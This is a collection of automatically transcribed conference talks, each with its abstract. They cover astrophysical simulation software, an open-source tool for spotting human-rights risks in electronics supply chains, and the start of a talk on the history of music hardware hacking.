simulations, there is no planet B, and the Earth is quite unique and perfect for human life. So please take care of the Earth and take care of yourself and of all the other people on the Congress. And thank you for listening. And thank you to everyone who helped us make this possible and to the people who actually coded our programs with which we simulate. Thank you. Thank you for the beautiful talk and for the message at the end. The paper is open for discussion, so if you guys have any questions, please come to the microphones. I'm asking my signal, Angel. No questions right now, but microphone too, please. Yes, thank you very much. Very beautiful talk. I can agree. I have two questions. The first is you showed you are using Navier-Stokes equation, but on the one hand you have the dust disk, and on the other hand you have solid planets in it. And so are you using the same description for both, or is it a hybrid? It very much depends. This is one of the things I showed you that for Pluto we write this C file that specifies some things and about every physicist has somewhat his or her own version of things. So usually the planets, if they are large, they will be put in as a gravity source and possibly one that can accrete. And pebbles are usually then put in a different way. However, also pebbles are at the moment a bit complicated. There are special groups specializing in understanding pebbles because as we said in the beginning, when they collide usually they should be destroyed. If you hit two rocks very hard together, or two rocks together they don't stick. If you hit them hard together they're splatter around and we don't add up with bigger objects. So to explain, pebbles are small rocks or big sandstones or something like that. So bigger rocks but not very big yet. It depends on which code you use. Very short, maybe one. Do you also need to include relativistic effects or is that completely out? That's a good question. Mostly if you have a solar type system, you're in a range where this is not necessary. For example, with the binaries, if they get very close together then at the inner part of the disk that is something we could consider. And actually I know for Pluto it has modules to include relativistic physics too. Yes. Thank you. Okay, we have quite some questions so keep them short. Number one, please. Thank you. Yeah, thank you very much for your interesting talk. I think you had it on your very first slide that about 70% of the universe consists of dark matter and energy. Is that somehow considered in your simulations or do you handle this? Well in the simulations we make, we're doing planets and disks around stars, it's not considered there. In this simulation we showed you about the universe. At the beginning the blueish things were all dark matter so that was included in there. Okay, thank you. Okay, microphone three. Hi, thanks. Sorry, I think you talked about three different programs. I think Pluto, Fargo 3D and a third one. Azoring, say you're a complete beginner, which program would you suggest is like more, like if you want to learn more which one is user friendly or good to start with? I would suggest Fargo first. It's kind of user friendly, has somewhat good support and they are always also always very thankful for actual comments and additions if people actually are engaged in trying to improve on that. Because we are physicists, we're not perfect programmers and we're also happy to learn more. So yeah, Fargo I would suggest it has some easy ways of testing some systems and getting something done. And it also has a very good documentation and also a manual how to make the first steps on the Internet so you can look that up. Awesome, thank you. Let's get one question from outside from my signal angel. Thank you for your talk. There's one question from ISC. How do you know your model is good and when you can only observe snapshots? Oh, that's a good question. We have to, as we said, we're in theoretical astrophysics so there are theoretical models and these models cannot include everything. So every single process, it's not possible because then we would calculate for years. To know if a model is good, you have to... Usually you have a hypothesis or an observation that you somehow want to understand with most of the necessary physics at the stage to reproduce this image. Also from the observation, we have to take into account what our parameters should be, how dense the end of the simulation should be and things like this. So by comparing to observations, that's the best measure we can get if we kind of agree. Of course, if we do something completely wrong, then it will just blow up or we will get a horribly high density. So this is how we know physics will just go crazy if we do too large mistakes. Otherwise, we would try to compare to observations that it actually is sensible what we did. That's one of the most complicated tasks to include just enough physics that the system is represented in a good enough way but not too much that our simulation would blow up in time. Number two, please. I've got a question about the adapted grids. How does the computer decide how to adapt the grid because the data where the high density comes after making the grid? Yes. This is actually quite interesting and also not quite easy to answer question. Let me try to give a breakdown nutshell answer here. The thing is you measure and evaluate the velocities or in the flux you also evaluate the velocity. And if the velocity goes high, you know there's a lot happening. So we need a smaller grid than there. So we try to create more grid cells where we have a higher velocity. In a nutshell, this is, of course, in an algorithm a bit harder to actually achieve but this is the idea. We measure the velocities at each point and then if we measure a high velocity, we change to a smaller grid. So you can predict where the mass will go and where the densities are getting high. Exactly. Step by step. Okay. To say. Thanks. We stay with microphone too. Okay. I've got a bit of a classical question. So I guess a lot relies on your initial conditions and I have two questions related to that. So first, I guess they are inspired by observations. What are the uncertainties that you have? Be them what is the impact if you change your initial conditions like the density in the disk? Yeah. Right now, my main research is actually figuring out sensible initial conditions or parameters for a disk. If you just have an initial set of conditions and a sensible set of parameters and let it run very long, you expect a system hopefully to converge to the state that it should be in. But your parameters are, of course, very important. Here we go back to what we can actually understand from observations. What we need, for example, is the density, for example, and that is something we try to estimate from the light we see in these disks that you saw in this nice grid with all these disks. We estimate, okay, what's the average light there? What should then be the average densities of dust and gas in comparable disks? Okay. Thanks. Okay. One more at number two. Yes. Thank you for the talk. When you increase the detail on the grid in the Euler model, you have to, when you want to compute the gravitational force in one cell, you have to solve all the masses from all the other cells. So the complexity of the calculus grows quite radically at the square of the, how do you solve that? Yes, that's it. Or do you just put more CPUs? Well, that would be one way to do that. But there are ways to simplify if you have a lot of particles in one direction and they are far away from the object you're looking at. So yeah. So if you have several balls here and one ball here, then you can include all these balls or you can think of them as one ball. So it depends on, you look at, so how you define how many particles you can take together is when you look at the angle of this, of the, yeah, the big or the many particles will have from, seen from the object you're looking at. And you can define a critical angle and if it's, if an object gets smaller than this, or if a lot of objects get smaller than this angle, you can just say, okay, that's one object. So that's a way to simplify this method. And there are some, yeah, I think that's the main idea. Okay, we have another one. Do you have a strategy to check if the simulation will give a valuable solution or does it happen a lot that you wait one week for the calculation and find out, okay, it's total crash, that trash or it crashed in the time? So that also depends on the program you're using. So in Fargo, it gives these outputs after a certain amount of calculation steps. And you can already look at those outputs before the simulation is finished. So that would be a way to control if it's really working. But I think it's the same for Pluto. So you get every, you set, there's a difference between time steps and actually output steps. So and you would define your output steps not as the whole simulation, but you can look at each output step as soon as it's produced. So I usually get like 500 outputs, but I already can look at the first and second after maybe half an hour or something like that. Yeah, but it also happens that you start a simulation and wait and wait and wait and then see you put something wrong in there and well, then you have to do it again. So this happens as well. Thanks. Okay, one final question. Yeah, okay. Is there a program in which you can calculate backwards so that you don't have the starting conditions but the ending conditions and you can calculate how it had started? Not for hydrodynamics. If you go to anybody, there is a way to go backwards in time. But for hydrodynamics, the thing is that you have turbulent, almost like chaotic conditions. So you cannot really turn them back in time with anybody kind of because actually it's kind of, well, it's not analytically solved, but it's much closer than like turbulence, streams, spirals and all the things you saw in the simulations. Okay, I guess that brings us to the end of the talk and of the session. Thank you for the discussion and of course, thank you guys for the presentation.
This year the Nobel prize in physics was awarded to three astronomers changing the understanding of the Universe and finding the first exoplanet. This is a good reason to dive into astronomy, numerics, and programming and to learn how modern astronomy creates the pictures and models of the reality we observe in the night sky. Let’s find out together how we can simulate the Universe and grow new planets – computationally! In all ages people have gazed at the stars and tried to grasp the dimensions of the Universe and of the teeny-tiny marble we call our planet and wondered how unique it actually is. From the ancient geeks to Johannes Kepler to modern times we slowly advanced our understanding of the sky and the laws necessary to describe the orbits and evolution of all its objects. Nowadays computational power has greatly increased. So we can further our understanding of the Universe from basic, analytically computable orbits to the challenge of turbulent gas flows – only accessible with numerical simulations. Let's go on a journey through space and compare the data we observe with breath-taking accuracy using instruments like ALMA, VLT, Gaia, and Hubble Space Telescope to numerical simulations now possible due to computer clusters, multi-core CPU and GPU-calculations. We want to explore the physics and numeric algorithms we need to comprehend the Universe and travel to the unexplained territory of problems we can not quite solve yet. We present three state-of-the-art hydrodynamics programs: PLUTO (by A. Mignone), FARGO3D (by P. Benítez Llambay and F. Masset) and AREPO (by V. Springel). All of them are free open source software and commonly used in research worldwide. Using their example, we demonstrate how hydrodynamics recreates many of the things we see in the sky, including planets. Simulations teach us how rare the formation of Earth was and show that there is no alternative planet in reach. In modern times we humans continue to gaze at the stars. Even without Planet B in sight, we are still fascinated with what we see. Numerical methods help us satisfy our thirst for knowledge and accelerate the research of the Universe.
10.5446/53202 (DOI)
The three persons here to announce it is Andreas and if I'm right Sebastian and if I'm right because I have the code names of course Tamara in their presentation they have their real names or something like that. Okay their presentation is actually about a tool and we all know that we use electronic gadgets everywhere and but we're not aware about what actually the human cost is of all these things and they are developing a tool that shows us this information and it could probably and hopefully help us a lot in defining what things we're going to use in our daily life. I want you to give them a welcome applause please go ahead. Good morning thanks for getting up early and coming here really grateful for that. I'm Sebastian this is Tamara this is Andreas and we are building a software tool for easy supply chain risk analysis and I will start by talking about the background of all this what kind of risks we analyze and why Andreas will talk more about how we do the analysis and then tomorrow we'll talk about our project Phaetronics. So the first thing I want to do is unpack this the slogan a little bit. So a play chain is basically all the steps that happen to a product before it is a product right it starts with resource extraction and then somehow components are being made or assembled and at the end you have maybe a mobile phone or an Arduino or something like that and when you're doing supply chain what you work with supply chains basically you have to acknowledge that electronics production happens all around the globe so that's a major like thing that makes it complicated. Risk in the sense of social risk so what we want to do is minimize harm that is that is caused to people involved in the production of electronics devices. Analysis in the sense that we compute it so we have a computational model of what kind of harms risks are in the supply chain of a product and the whole thing is supposed to be easy and easy is meant in the sense that you do not need to collect extra data. If you are designing an electronic product the tool should work only with the data you already have. As I said supply chains are global making electronics products is a global affair basically anything any any product you can think of will probably involve four to five continents such as this smartphone here which is a pretty typical case. It basically starts with resource extraction at the blue-green dots and resources or like raw materials are located all around the globe so they come from South America, North America, Africa, Asia and so on and then processing and manufacturing happens in a lot of other places so basically the material for any product is shipped around the globe like crazy. The background of our work is essentially sustainability. You may have heard of this model of sustainability that is made up of three pillars the social pillar, the environmental pillar and the economic pillar and many people associate sustainability mainly with the environmental aspect making things ecological not emitting too much CO2 and so on and that sometimes leads to the social aspect of sustainability being a little bit underrepresented. Social sustainability means avoiding harm you know improving people's well-being and so on and that is exactly the aspect that is most important to our work. So what about the social sustainability of electronic supply chains? Basically you know across all the stages of a supply chain you can find a whole huge catalog of human rights violations and other problems that are associated with the making of electronics products from having to work in dangerous conditions for instance being poisoned by toxic chemicals or being harmed when there are the safety precautions are not sufficient. Being forced to work for instance because people are in so much debt that they need to repay. Children having to work, people not being able to form unions, having to work too many hours or not making a living wage even though people work you know 10 or 12 hours or more a day. Being displaced from one's home for instance when mines are being established or extended then it frequently happens that the people that have been living there are forced to move. Being discriminated against or not enjoying social security such as you know being able to take time off when you are sick. For instance in gold mining many of these cases are well documented. Child labour happens in very many places and also you may be aware that mercury is frequently used to extract gold when gold is being mined and of course mercury is toxic and sometimes you know safety precautions are not taken and people get poisoned and the environment gets poisoned. So these are just two simple examples to make it a bit more plastic and the big picture is that the digitalization which we enjoy and celebrate here at Congress happens on the backs of the people who make these electronics. So how can we fix that? I want to go through three example steps you know three puzzle pieces of the solution. The first one is that there do exist some certifications that rule out certain human rights violations. For instance you know the fair trade label from bananas or a coffee or whatever and there exists a fair trade certification for gold. There also exists another certification for mined also for gold and yeah these do rule out a good part of these human rights violations. There's another standard, ERMA, which is in the process of being established which applies to more metals or yeah more materials that come from mining. But the problem with all these certifications is that they are not broadly available. So in each case there only exist a few mines that have a certification and most of the mines don't. So another way to put this is that there does not seem to be a huge demand for certified metals at the moment and I think this is like one of the things that need to change. A second example is that when you are the designer of an electronic product of course you get to decide what goes into that product and you make a lot of design decisions and of course these decisions determine what kind of raw materials are needed to build your products. So this is a fun little example. This is a DIY mobile phone. So this phone was built in a FabLab and at the back of the phone you see these two little knobs sticking out and these little knobs are capacitors. They are aluminum capacitors because the person who built this phone did not want to use tantalum capacitors because tantalum is well known to be associated with the whole catalogue of human rights problems. So yeah here you can very clearly see this design trade between making the phone a little bit thinner or avoiding the use of certain resources. Many metals can be recycled. Not all metals do get recycled because it's not always cost effective. But of course when it's being done and when it's possible recycling is a good way to reduce the overall amount of resources that are being extracted. Why isn't it not always cost effective? I think this is again partly a matter of supply and demand. When there's a larger demand for recycled metals, I would be cost effective to recycle a larger amount of them. So the general message is there do exist alternatives but then the question is why do I keep telling you there's no demand? Why are waste there no demand? Why do not all people try to source their materials responsibly? And part of the answer is that electronic supply chains are very complex and very deep. This is a supply chain taken from the Naga IT project. A very nice project which is also a pioneering project in Fair Electronics. And they tried to build the most sustainable computer mouse possible. So they took the mouse because it's a very simple product and they tried to map out their entire supply chain as fast as possible. And you can see that even for the simple product, the supply chain chart is overwhelming. And you as a designer or as a maker of an electronic product, you are basically at the top of the supply chain and you kind of have to look backwards and see what your suppliers are and what are their suppliers and so on. And with this huge amount of steps, it's very difficult to know where to start. And this is where a tool comes in and Andy will tell you a bit more about how that works. Okay, thank you. So yeah, we have learned now that there exist severe issues in in the production of electronics devices, severe social issues. We want to do something about this. And but we have also seen right now that it is not an easy task that it is complex that supply chains for electronics products are complex and deep. And so yeah, the question is where can we start and one thing that we or that someone as a designer of an electronics products does know is the components that go into an electronics products for a product. For example, here the computer mouse, you can see it's made from the casing, there's the cable, there's the circuit board, there are resistors that go into it. And so this is one thing that we know. And so the idea for our tool is that you can feed this component list, maybe you have a bill of materials available, maybe you can just disassemble a device, feed it into our Fairtronics tool and get a hotspot analysis that tells you where are, where's the highest risk, where are the hotspots for social issues in your device. So how could this be done? And I will walk with you through some steps to make this more tangible. Like I said, one component in our computer mouse is the resistor. And if we take the resistor, we can start collecting generic data, what the resistor is made of. There's some copper flowing part of the resistor, there's some iron part of the resistor. And one example for a data source that you can see here is from an environmental assessment of generic or average electronics components. And there is here what you can see here listed is the materials that an average resistor consists of in weight. For example, copper it's made of 61.71% of copper or 12.49% of iron in weight, an average resistor that we see here. Okay, so now we know something about the composition of one component. And when we follow that trail and say, okay, a large part of our component is copper, we can ask where does the copper come from. And here's another example of a data source that tells us something about this. It's from the US geological survey. And they publish yearly estimates about the global production of different minerals. And you can see that in 2018, Chile produced 5.8 million tons of copper or Congo produced 1.2 million tons of copper in 2018. These are estimates based on publications from different firms or governments about their copper production. Okay, so we can assume, okay, a certain amount of the copper that flows into our component, into the resistor, comes from Congo. And now we can ask, okay, how are the working conditions in Congo? Are people getting fair salary there? How long do they have to work? Is their child labor possibly involved? Is their forced labor possibly involved in Congo? And there, you can all find quite some data on this country level that tells you something about working conditions in different countries. And also our observation is that the situation is improving here about the data quality that you get, especially since the UN sustainability goals were established, you can find more and more better quality data about social conditions, working conditions in different countries. And here's one example from the International Labor Organization. They also publish a report on estimates about, in this case, the working poverty rate. So the share of people that do work, that still live below the poverty line. And in this case, we are interested in Congo and see, okay, this rate is 70%. So 70% of the people in employment still don't have enough to live. And a huge part of our work is to collect this data, to collect data about raw material composition of electronics components, to collect data about production rates of these raw materials in different countries, and to collect data about the indicators that tell us something about the working conditions in these countries, bring them in a common format and collect them in our database. And as soon as we have this data, we can, you know, start asking some questions and do some basic computations. For example, we might be interested in the significance of copper produced in Congo. And well, when we say, okay, Congo's share in world production of copper is 5.81%. And the share of copper in our resistor weight is 61.71%. We arrive at 3.58%. And we could interpret this as something like medium activity. So anything, we can say, okay, around 3.58% of copper in our resistor, we can assume, stems from Congo. And well, it's between 1% and 10%. So quite significant. It's medium activity. Quite important for our resistor. Anything that is more than 10% would be high activity. Anything below 1% would be low activity just to qualify this a bit. And then how severe are the impacts in Congo? If we take our example of fair salary, we have that example of working poverty rate of 70%, which is among the top 25% of rates for all the countries that we have for this indicator. And this is just a qualification that we can make at this point and say, okay, anything that is any rate that is among these top 25% of rates is high impact. And if we do this for our whole product for the computer mouse, we can actually see that copper is not only the most prevalent metal in the resistor, but for the whole computer mouse, mainly due to the cable. So well, copper is quite prevalent in our computer mouse. And we also identified a social hotspot from the data that we just had that is the copper extraction in Congo. And the impact category that we looked at is fair salary. And one interpretation from this analysis would be, okay, if we find a source of fair copper, certified copper for the cable, or find some producer of cable that is willing to work with us in improving the situation, that would be a big step forward for the fairness of the computer mouse. Now there are some limitations from this approach that I would like to point you to. For one, it's an assessment on a very generic level, so you should take this with a grain of salt. It's just to highlight hotspots, to highlight those areas where it's worth looking deeper and try to identify the real issues behind this. In a whole approach, we follow a methodology called social life cycle assessment, which is similar to environmental assessments of products. So you look at the whole supply chain of the whole life cycle of a product and in an environmental assessment, you are interested in the CO2 emissions or in the water use that happens during the whole life cycle. And in our case, we have just different impact categories. So the impact category is not water use or CO2 emissions, but direct social impacts. And these are the ones that we are focusing on. So anything related to workers, freedom of association, working hours, forced labour, health and safety, social security, equal opportunities, child labour and fair salary. And also, as you can see from the example, we are focusing right now just on the raw material extraction phase. In the future, this should be extended also to cover other life cycle phases, to get to a full assessment, social assessment. Okay, and now I will pass on to Tamara, who will tell you more about our project and the tool that we are developing. So thank you. Now that Sebastian already told you why we are working on this project and you told you how we are doing this, I would like to show you a bit of what we have done already. So we are building a web-based analysis tool to identify social hotspots. You can see a screenshot of the current working progress of it. It should be an MVP, should be done by the end of February. And to revisit that example for the computer mouse, here you can see that the component that you should look at first is the data cable. And then that if you find a sustainably sourced or fair copper for your product, that would be a significant improvement. And now you may be wondering that is really great and how can I contribute it? So first of all, to all the makers of electronic products, it would be great if you let us know what kind of tools you currently use and what formats you export. You could just send us your bill of material lists or PCB layouts so we can offer templates because we want it to be really easy to use. So another thing is just use our tool by the end of February, give us feedback, tell us what functionalities are working for you, what are not. And yeah. And another thing is we are an open source project. We would love to collaborate. So if you have time when you're hence and you're motivated and passionate for the subject, just join us. And you can find us on goodlip. Here's the link. A very crucial matter is the procurement of data. Without data, we cannot conduct an analysis. And our current database is rather tiny and a lot of manual labor went into it. And even though there have been significant improvements concerning open source data for social indicators, it's still not in a standardized format to feed them into a coherent system quickly. And another thing is the raw materials that constitute components. There's even harder to find something. So if you're into possession of data, if you're probably a manufacturer and you have lists, or if you just love to extract data in an automated way, yeah, let us know. And the last thing is talk about it. So even if you're not a maker yourself, yeah, like spread the word, talk with people about it. And the more people know and think about it, hopefully, the more can be done. And if it's at the bare minimum, more conscious towards this topic. And to wrap up this talk, I'd like to reiterate what Sebastian said in the beginning. Currently, in the production of electronic products, human rights have violated at almost every step of the supply chain. And this must not be the case. And this does not have to be the case. As he said earlier, there are alternatives. You can use certified raw materials, you can use materials from certified mines. You can actively take worker conditions into consideration in the design process. And you can use recycled material if possible. But most importantly, you can increase the demand for sustainably sourced raw materials and a fair production of electronic products. And here's also our contact information. So feel free to write us an email or you're here, we're here, you can come and talk to us. And I'd also like to thank the prototype fund at this point, because they have been funding us so far. And that was a great help. Yes. Thank you. And thank you for your attention, your interest and your time. Super. Thank you. Wow. You can be really proud about your product. I wonder if there are questions here among our audience who's really clearly woken up and fresh. And to the point, I hear, number two, yes, please. Is it on? Ah, no. Okay. Collecting data is a difficult task, as you just said. So I wanted to ask if you share it with other databases like Wikidata or another open data source, or if you like, only keep it to yourself because it's too hard to actually connect to other data sources. Well, technically, we're working on a rest interface for the data that we collect, and we happily share it. For some, we are not sure if we are allowed to share them. So if there's some expert here concerned with property rights of databases, that would be great to talk about them, but we happily share the data that we can. And if you want to connect here, great. Okay. Thank you. Here at number one. Thanks a lot for the presentation, and I'll probably send you some bill of materials soon. I mean, I've got one question. I know that Fair Looted offers the Stannol soldering tin, but do you also plan to offer sold up paste because for all SMD assembly, obviously, it's not possible to use that Fair Looted product? Yeah. Okay. So for context, basically, that was our inaugural project at Fair Looted. We're an association that works on Fair Electronics. And yeah, basically, the first project we did was we got together with Stannol, which is a maker of solder products, and designed a solder wire. So what you would use when you have your solder iron. So I would suggest that you look at, you get in contact with Stannol directly. Actually, we are not so much involved in distributing the solder anymore. Number one. Just by, can you repeat the question, please, because the mic was... Okay. So there is no product on the market at the moment, which you can recommend for soldering paste. Stannol, you have their own product line, they call Fair Tin. So that is Tin with a traceable origin, following best practices and mining. So that might be an option for you. Okay. We have question number two. Thank you. You hear me? Thank you very much for your talk. I was wondering if you've, have you gotten in contact with so purchasing organizations? Because in supply chains nowadays, you often have a service provider that is in between the producer who buys his products and the, and the vendors. And often these purchasing service providers are asked to help control the supply chain. We haven't actually, and to be honest, I think we need to start at the point where there is some kind of momentum. And for us, I think it's easier to reach people like you, you know, maybe hardware developers or maybe small enterprises or maybe just activists. Because I mean, I cannot really make really broad statements, but I think big parts of the whole industry are kind of conservative when it comes to like stuff like sustainability. And we kind of have to work our way through there, I think. Okay. We have question number three there. One second. Yes, please. Number three. First of all, thank you for your talk. And my question is you used a relative approach regarding the evaluation of the impact category. And I was wondering if there was a specific reason for that or if I mean, you could have instead just evaluated the absolute value by which you compare the different countries, margin. You mean to have some kind of reference point and say, okay, it's better or worse than the server reference point. The approach that I showed you right now is our starting point where we are following some well, an approach that modeling after approach that we found in literature. And that seems doable for us right now within this six month timeframe that we have to arrive at a full prototype, but it's not fixed. So certainly the whole methodology can still be improved. So yeah, that's pretty much what I can say to that. Thank you. Fine. Thank you. Yes, sir, please. Hello. My question also concerns the relative impact approach that analyzes, for example, with the mouse, which countries and which materials from these countries had an impact. And I was also wondering if, except for the country of origin and its world market share and also the share of weight in the product, as you showed with copper, as if you're also taking into consideration other factors, for example, the rarity and different impacts of materials, for example, copper being more common than tantalum, as you mentioned. And if you would consider adding that as an additional factor into your analysis. Okay. Right now, we do not consider it. But one could certainly think about it. Maybe we can talk about later about this idea. It would be great. Yeah. That's fine. Do we have questions online? No one? We're all asleep. I see someone here at number two. Please, sir. Yeah, hi there. I'm also a prototype fund recipient. It's really, really cool to see them doing all this nice awesome stuff. I am a happy fare phone owner. And I also have another non fare phone. And the fare phone was twice the price of the other one. And whenever I ask people, they ask me which one should I get, I say, like, well, do you want to spend twice? That's what you have to get yourself into. In the fact that in the face that we have this failure market wise, do you see a new role for regulation to actually make it easier for people who build things like this to do the right thing? Because when you speak to small businesses, the thing that I always have people push back at me is that we cannot make this viable at these prices. So we're forced to use all the non fare parts in our electronics. So concerning regulation, yesterday I gave a lightning talk on the Lieferketten Gazette. Right now there's a broad NGO campaign going on that is trying to establish mandatory human rights due diligence in Germany, but also there are initiatives in other countries such as Switzerland, France already has supply chain law and so on. And there are also some processes on the EU and UN levels. So I think that is, I mean, that, but that is basically the bare minimum, right? I mean, not violating human rights should actually not be something great. It should be, you know, yeah, should be something everyone does. Yeah, okay. That's absolutely the point actually in our lifestyle, Western world hooked up to electronics. And yeah, we can't live without it. But I had a question as well for you. Aren't there isn't another one? I have a question. But number three, please, you can. Hello, I have a question about the lack of data. You said you need more data and you asked for data sheets of parts. But I think you also need more data about metals or working conditions. Do you have the top three data what you would appreciate based on the metals or on the working conditions in countries, for example, probably we can provide you with that. It would be hard to to tell something about the top three. It's just well, we right now we are at a state where we think, okay, on a very generic level, we can cover most of the minerals that are relevant. We can cover most of the countries, but most of the indicators for the indicators, there are still a lot of gaps. Well, that you maybe you can find an indicator for child labor, but it covers only 20 countries and not all of the countries. So on this level, yeah, on a very generic level, we are quite complete. But then a good next step, for example, would be to get data that is more specific to industries and not only on a country level. So that would be great. In general, it's just well, we need more of everything. And also components and what raw materials we constitute. So yeah, as Tamar just said, well, the component composition is maybe more the more severe lack that we have right now. So it's more generic, it is less accurate. May I have a question as well? We still have a few minutes left, but did you mention how you financed or backed or did you do that? I think I did. I'm not sure if it but there's also the logo. And this brings you to deal with which stage meaning the product is there or is there something in the future waiting? Until the end of February, this round round is finished. So we want to have a minimal viable prototype at that point. But I think all of us would be happy to see more of that in the future. So basically the period where we're being funded by prototype fund is almost over, until February. But the failure will try to keep the project going as best as possible. So we're also trying to build a small developer community around it. Yeah, and let's see what happens then. Yeah, and so spread the word, I would say, so that you have more data as well in your database before the end of February. So we'd ask everyone to give a warm applause and remember, give them the data and they can bring it further. Thank you. Thank you guys for the interview. Fantastic. Thanks for joining us. Go for it. Check it out.
Electronic gadgets come not just with an ecological footprint, but also a human cost of bad working conditions and human rights violations. To support hardware makers who want to design fairer devices, we are building a software tool to easily discover social risk hotspots and identify measures for improvement. The issue of human rights violations in the supply chains of electronics products is nowadays being broadly discussed. However, from the point of view of a hardware maker, it is difficult to exclude the possibiltiy of harm being done to workers in their supply chains due to their complexity and lack of transparency. At the same time, projects such as Fairphone and NagerIT demonstrate that improvements are, in fact, possible. At FairLötet and the Fairtronics project, we try to support those who would like to improve the social impact of their products in taking the first step towards improvement. To this end, we are building a software tool which will provide a first estimate of the risks contained within a given design: circuit diagram in, analysis out. The analysis shows the main social risks associated with the product, due to which components and materials they arise, and in what regions of the world the risks are located. This enables the user to understand where efforts towards sustainability should be concentrated, e.g. by making informed purchasing decisions or engaging with suppliers. In this talk, you will learn about the risks associated with electronics, how they are estimated, and what data we gather to compute them. No deep background in sustainability or hardware is required.
10.5446/53212 (DOI)
Music Fantastic that you all are here actually since it's all teared down moment and still we have enough we have lots of people here interesting this is as well an interesting talk because it's Helen Lee who's going to present us actually give us an overview actually about what hackers you know in music meant actually in the history so it's a given overview I understood as well she gives a certain examples and I think she's gonna kick this a little bit further because she's gonna talk a little bit about our current work and future objectives so I would fast and seed bells I would say if yes Helen Lee give her warm applause hello yep so I'm Helen this is if you want to follow my stuff or download any of my things that I mentioned in the talk I've got GitHub and various I put lots of my work on Twitter so okay right I am going to talk to you today about we're gonna give you a story I'm gonna give you a story about how a group of music hackers in the 1940s changed the face of music technology forever and how they didn't know anything that by what they were doing but they still managed to do some incredibly cool things by just disregarding and being really awesome hardware hackers and I'm also gonna give you an overview of some of the coolest projects coming out of London and Berlin at the moment and so I've been I'm living in Berlin at the moment but I was active in the music hacking scene in London for a long time as well so I'm gonna show you some cool projects but before I start off on my story and cool projects I'm going to just introduce myself and I am a creative technologist which is a ridiculous buzzword but people like to put you in a box but I'm basically in massive nerd who really likes arty stuff so I like to smush them together my my favorite things to smush together are electronics and hardware and with music technologies and so with that in mind I make a lot of strange musical instrument creations usually very experimental in form I'll show you some of that as well this is one of my experimental instruments and I make sonic circuit sculpture creatures and I've taken them on residencies in London, Shenzhen and Copenhagen and I just really like experimenting with what a musical instrument looks like and not so much what it sounds like I mean I am into other people's noise art but for me I like my instruments to sound melodic but yeah form I'm very interested in experimenting with I also really like at the moment this is this is made out of brass and I've made a lot of stuff with different metals and but at the moment I'm on a big soft circuit kick and so I'm experimenting with electronic embroidery and soft robotics to make kind of kinetic sculptural squishy creature things and I'll show you some of that later too now obviously this doesn't pay my rent shockingly and so I also do some product design and a lot of curriculum based things and I'm a writer as well so this is a product that I designed that's actually my hand on the box very exciting and it's a wearable instrument for children sold by P. Maroney and Adafruit and you know etc and it's a DIY wearable gesture-based instrument for children to learn how to code with and I designed that with Imogen Heap and I'll tell you about that cool project later but that's something I do and I also do a lot of writing this is a still from one of my books I wrote recently last year it came out and one called the crafty kids guide to DIY electronics where I teach basic electronics through the medium of papercraft, origami, sewing and kind of like DIY robotics as well I also write for Hackaday I've written for blah blah blah it doesn't matter I write words for many sometimes anyway that's me I am gonna tell you one of my favorite stories of music tech history I'm gonna start off here with this rather pretentious quote from a rather pretentious man who I still kind of love it's a guy called John Cage who most people know him for his experimental compositions and his and his many and varied writings on on the subject of what is signed and what signed art is but he was also a pretty early on a hardware hacker he made experimental instruments actually one of his first famous pieces was him like smashing up a piano and changing that so he was a composer but he was also an experimental hardware artist and then he said this there is no noise there is only sound and the reason I put this quote up there is to kind of make you that remind you that all music is made up okay all instruments are inventions the violin wasn't a violin until probably the 13th century when various instruments that came before it converged and someone using new techniques new tools and it starts and it keeps evolving through the ages right and I think you could think of an instrument as a as a specific thing but it's really not we've been messing around with science since we've been humans basically and ditto with compositions you might think of classical music mainstays like Stravinsky strice or debut see as as these kind of like boring establishment figures but actually in their day they were seen as avant-garde people walked out of their performances they were hit pieces about them in the males you know the Daily Mail of the time and so basically anything that sounds strange to you now or something that's experimental to us could well have an influence in a long-reaching way and so yes who are you I'm gonna tell you about my favorite conspiracy theory as well so even dying to the note a 440 Hertz Middle A and it's it was not even it was not the latter sorry it was not 440 Hertz until the 1950s when a group of dudes met up in one room in London and everybody signed this agreement saying okay now a is a 440 Hertz before that a flutin Italy might sound different to a flute in France you'd have like these small tonic tonal variations and so it wasn't until yet the 1950s that it became actually the letter a there's a wonderful series of conspiracy theories around this that actually that they chose 440 Hertz because it's a method of population mind control and there are alternative websites out there now you can literally go if you search for like and 440 Hertz conspiracies there are websites that are campaigning like groups that are campaigning for it to be changed for the whole of modern music to be to be changed there's one at 432 and there's one at 438 and if you're in the 438 camp because they were opposing camps as well so if you're in a 438 camp you're in luck because someone's made a music adjuster okay so you can take your track that you've done and you can put it into a converter and it will convert all of your music into 438 so you can do that if you like and there's even a radical fringe group calling for the middle a to be 538 which is absolutely insane but there we are I love it and so if you ever want to go down to conspiracy theory YouTube black hole which you probably will do we're all at camp and you know who you can't Congress not camp and you can you can look at that then but basically my point here is that music is all made up right and instruments are all inventions so you know there are no rules and I'm gonna take you through and one of the paths one of the many paths of music history and music hacking and we're gonna look at one piece of hacked technology and how people who played with it and did things with it that they weren't supposed to do changed modern history modern music production this is the magnetic tape recorder and it's a lovely device and it was used popularized in World War two by the Nazis who used it to chop up propaganda and so and the and after the World War and after the World War and the BBC took on it took a ticket on themselves to try and develop a version of this so this is relatively modern technology so in the 40s and 50s that started become becoming popular and it was used for real-to-real broadcasting right so before this it was gramophones and but and a bunch of so they were used in music studios and they were relatively expensive as it became cheaper and a bunch of music hackers and saw its potential to do something more than just line it up so these hackers and got their hands on a bunch of these a bunch of these magnetic tape recorders and and as people are wants to do with technology that they get had their hands on it they started to fuck with it in a new and very exciting ways and what they did is they they and as a movement in in Paris and then early 1940s called music concret which was the first group of people who were doing this aside from one lonely guy in Egypt as well but there was like the epicenter of this was in is in Paris and what you do is you see that the the actual tape there you use a razor blade to cut it and then you can for example flip it over tape it back together and then you've got one piece that's backwards right okay and using that technique I'll show you how actually you okay so not only can you chop things up and turn them around you can speed them up and slow them down this gives you this seems so basically if you do it faster it will give you a higher tone and if you do it slower if you slow it down it will be lower okay we all know this kind of instinctually now but back then this was fellow this was completely revolutionary you could make sounds that were not existing in nature and take for example the plucking of a violin string okay you pluck a violin string and it comes on quick it's like boom and then if you let it die off there's a long so what we call that in music is this a sharp attack and a long delay and that's how a lot of musical instruments or natural sounds will work okay they will fade off okay but using this technology you could switch it around so it had the the opposite effect around warm the long attack and a short delay so you could create sounds that are not found in nature now which is extraordinary and at the same time there was the advent of something called field recording which was you could go outside instead of having to record in a studio you could have a physical piece of equipment that you could carry around with you and and and a microphone so you could go and record sounds outside found sound is what we call it and then you could take it back to the studio chop it up with a scalpel sellotape it back together re-record it and you could create this is just you know it's just a huge vast new set of tools that you can work with as somebody who's making music now the first people doing 